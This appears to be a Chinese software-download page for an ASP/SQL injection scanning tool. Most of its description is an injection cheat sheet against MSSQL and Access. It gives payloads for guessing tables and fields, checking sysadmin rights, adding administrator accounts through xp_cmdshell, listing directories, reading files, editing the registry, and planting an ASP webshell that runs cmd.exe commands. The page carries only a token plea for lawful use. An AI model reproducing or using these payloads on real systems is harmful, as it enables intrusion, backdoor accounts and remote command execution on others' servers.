网站安全检测入侵工具

网站安全检测入侵工具

网站安全检测入侵工具

网站安全检测入侵工具

人工检测,安心下载
软件投诉
分类
网络安全
大小
1MB
语言
简体中文
软件授权
免费软件
平台
WinAll
更新时间
2022-11-07

本专用工具作用十分强劲,期待学生们用以正道,别去做一些为非作歹的让人十分可耻的事儿,由VB语言撰写的网址网站漏洞扫描专用工具的名字,ASP引入网站漏洞扫描专用工具,尤其在SQL Server引入检验层面有非常高的准确度。

1.分辨是不是有引入

;and 1=1

;and 1=2

2.分析判断是不是mssql

;and user0

3.分辨数据库系统软件

;and (select count(*) from sysobjects)0 mssql

;and (select count(*) from msysobjects)0 Access

4.引入主要参数是标识符

and [查询条件] and =

5.检索时没过虑主要参数的

and [查询条件] and %=

6.猜数据库

;and (Select Count(*) from [数据库名])0

7.猜字

;and (Select Count(字段名) from 数据库名)0

8.猜字段中纪录长短

;and (select top 1 len(字段名) from 数据库名)0

9.(1)猜字段的ASCII值(access)

;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)0

(2)猜字段的ascii值(mssql)

;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)0

10.检测管理权限构造(mssql)

;and 1=(SELECT IS_SRVROLEMEMBER(sysadmin));--

;and 1=(SELECT IS_SRVROLEMEMBER(serveradmin));--

;and 1=(SELECT IS_SRVROLEMEMBER(setupadmin));--

;and 1=(SELECT IS_SRVROLEMEMBER(securityadmin));--

;and 1=(SELECT IS_SRVROLEMEMBER(diskadmin));--

;and 1=(SELECT IS_SRVROLEMEMBER(bulkadmin));--

;and 1=(SELECT IS_MEMBER(db_owner));--

11.加上mssql和体系的账号

;exec master.dbo.sp_addlogin username;--

;exec master.dbo.sp_password null,

username,password;--

;exec master.dbo.sp_addsrvrolemember sysadmin

username;--

;exec master.dbo.xp_cmdshell net user username

password /workstations:* /TIMes:all

/passwordchg:yes /passwordreq:yes /active:yes /add

;--

;exec master.dbo.xp_cmdshell net user username

password /add;--

;exec master.dbo.xp_cmdshell net localgroup

administrators username /add;--

12.(1)解析xml文件目录

;create table dirs(paths varchar(100), id int)

;insert dirs exec master.dbo.xp_dirtree c:\

;and (select top 1 paths from dirs)0

;and (select top 1 paths from dirs where paths not

in(上步获得的paths)))

(2)解析xml文件目录

;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));--

;insert temp exec master.dbo.xp_availablemedia;-- 得到当今全部控制器

;insert into temp(id) exec master.dbo.xp_subdirs c:\;-- 得到根目录目录

;insert into temp(id,num1) exec master.dbo.xp_dirtree c:\;-- 得到全部根目录的文件目录树形结构

;insert into temp(id) exec master.dbo.xp_cmdshell type c:\web\index.asp;-- 查询资料的內容

13.mssql中的sql语句

xp_regenumvalues 注册表文件根键, 子键

;exec xp_regenumvalues HKEY_LOCAL_MACHINE,

SOFTWARE\Microsoft\windows\CurrentVersion\Run 以好几个记录集方法回到全部键值

xp_regread 根键,子键,键值名

;exec xp_regread HKEY_LOCAL_MACHINE,

SOFTWARE\Microsoft\Windows\CurrentVersion,

CommonFilesDir 回到制订键的值

xp_regwrite 根键,子键, 值名, 值种类, 值

值种类有2种REG_SZ 表明字符型,REG_DWORD 表明整形

;exec xp_regwrite HKEY_LOCAL_MACHINE,

SOFTWARE\Microsoft\Windows\CurrentVersion,

TestValueName,reg_sz,hello 载入注册表文件

xp_regdeletevalue 根键,子键,值名

exec xp_regdeletevalue HKEY_LOCAL_MACHINE,

SOFTWARE\Microsoft\Windows\CurrentVersion,

TestValueName 删掉某一值

xp_regdeletekey HKEY_LOCAL_MACHINE,

SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey 退格键,包含该键下全部值

14.mssql的backup建立webshell

use model

create table cmd(str image);

insert into cmd(str) values (% Dim oScript %);

backup database model to disk=c:\l.asp;

15.mssql内嵌涵数

;and (select @@version)0 得到Windows的版本信息

;and user_name()=dbo 分辨当今系统软件的联接客户是否sa

;and (select user_name())0 爆当今系统软件的联接客户

;and (select db_name())0 获得当今联接的数据库

16.简约的webshell

use model

create table cmd(str image);

insert into cmd(str) values (%=server.createobject(wscript.shell).exec(cmd.exe /c request(c)).stdout.readall%);

backup database model to disk=g:\wwwtest\l.asp;

要求的情况下,像这样子用:

l.asp?c=dir

相关专题
触手怪入侵身体游戏安卓 36款

多特手游专题为您提供触手怪入侵身体游戏安卓,邪恶勇者一行安卓汉化。安卓苹果版一应俱全,找经典手游就来多特手机游戏频道下载!

贪吃蛇新传
贪吃蛇新传
更新日期:2022-10-18
欢乐药丸
欢乐药丸
更新日期:2022-11-08
连接与破坏
连接与破坏
更新日期:2022-11-08
自由坠落
自由坠落
更新日期:2022-10-18
驯养宾尼女孩
驯养宾尼女孩
更新日期:2022-11-08
开心猜猜看
开心猜猜看
更新日期:2022-10-18
细菌起源2
细菌起源2
更新日期:2022-11-08
公仔虫战
公仔虫战
更新日期:2022-10-18
梦幻之谜
梦幻之谜
更新日期:2022-11-08
主板检测 41款

多特软件专题为您提供主板检测,主板检测软件,主板检测好坏;安卓苹果版软件app一应俱全。多特软件站只提供绿色、无毒、无插件、无木马的纯绿色工具下载

显存检测软件Mats
显存检测软件Mats
更新日期:2022-11-07
电池检测软件(Smarter
电池检测软件(Smarter
更新日期:2022-11-07
车辆检测收费软件
车辆检测收费软件
更新日期:2022-11-08
显存检测软件Mats
显存检测软件Mats
更新日期:2022-11-08
华硕主板控制rgb风扇软件
华硕主板控制rgb风扇软件
更新日期:2022-11-07
华擎主板灯光控制软件
华擎主板灯光控制软件
更新日期:2022-11-07
过腾讯TP系统检测破解插件
过腾讯TP系统检测破解插件
更新日期:2021-10-19
CPU\网卡\主板序列号检测工具
CPU\网卡\主板序列号检测工具
更新日期:2022-08-06
数据库软件 41款

多特软件专题为您提供数据库软件,免费数据库软件,数据库软件排行;安卓苹果版软件app一应俱全。多特软件站只提供绿色、无毒、无插件、无木马的纯绿色工具下载

手机定位软件安卓版
手机定位软件安卓版
更新日期:2024-04-12
Excel安卓安卓版
Excel安卓安卓版
更新日期:2022-11-07
安卓皇帝安卓版
安卓皇帝安卓版
更新日期:2022-11-08
安卓基站锁定软件
安卓基站锁定软件
更新日期:2022-11-07
安卓手机字体软件
安卓手机字体软件
更新日期:2022-11-07
安卓手机备份软件
安卓手机备份软件
更新日期:2022-11-07
软件天堂安卓版
软件天堂安卓版
更新日期:2022-11-07
EGO软件安卓版
EGO软件安卓版
更新日期:2022-11-07
网速检测 40款

多特软件专题为您提供网速检测,网速检测在线,手机网速测试在线;安卓苹果版软件app一应俱全。多特软件站只提供绿色、无毒、无插件、无木马的纯绿色工具下载

网速测试
网速测试
更新日期:2023-10-11
测网速
测网速
更新日期:2023-10-11
测网速
测网速
更新日期:2021-09-30
网速管理
网速管理
更新日期:2020-10-16
网速限制
网速限制
更新日期:2020-09-02
网速通
网速通
更新日期:2020-08-18
过腾讯TP系统检测破解插件
过腾讯TP系统检测破解插件
更新日期:2021-10-19
Shadow x测网速软件
Shadow x测网速软件
更新日期:2022-11-07
上网速度测试软件
上网速度测试软件
更新日期:2013-12-17
数据库工具 41款

多特软件专题为您提供数据库工具,数据库查询工具,数据库连接工具;安卓苹果版软件app一应俱全。多特软件站只提供绿色、无毒、无插件、无木马的纯绿色工具下载

DBDiff(数据库对比工具)
DBDiff(数据库对比工具)
更新日期:2022-08-19
Scuba(数据库扫描工具)
Scuba(数据库扫描工具)
更新日期:2022-08-14
Dataedo(数据库文档工具)
Dataedo(数据库文档工具)
更新日期:2022-08-10
DBSync(数据库同步工具)
DBSync(数据库同步工具)
更新日期:2022-11-07
数据库同步工具(DBSync)
数据库同步工具(DBSync)
更新日期:2022-11-07
ExcelToSQL插入数据库工具
ExcelToSQL插入数据库工具
更新日期:2022-11-07
MysqlCopier(数据库复制工具)
MysqlCopier(数据库复制工具)
更新日期:2022-11-07
PDMan(数据库建模工具)
PDMan(数据库建模工具)
更新日期:2022-11-07
数据库编辑工具(SqlLobEditor)
数据库编辑工具(SqlLobEditor)
更新日期:2022-11-07
网友评论
友情链接
温馨提示
您好:
感谢您下载本软件。
现邀请您关注我们的微信公众号。
您将获取到此软件的安装使用教程及软件的相关课程学习。
如有疑问也可在微信公众号中回复问题,将会有人工客服为您解答。
好的,我知道了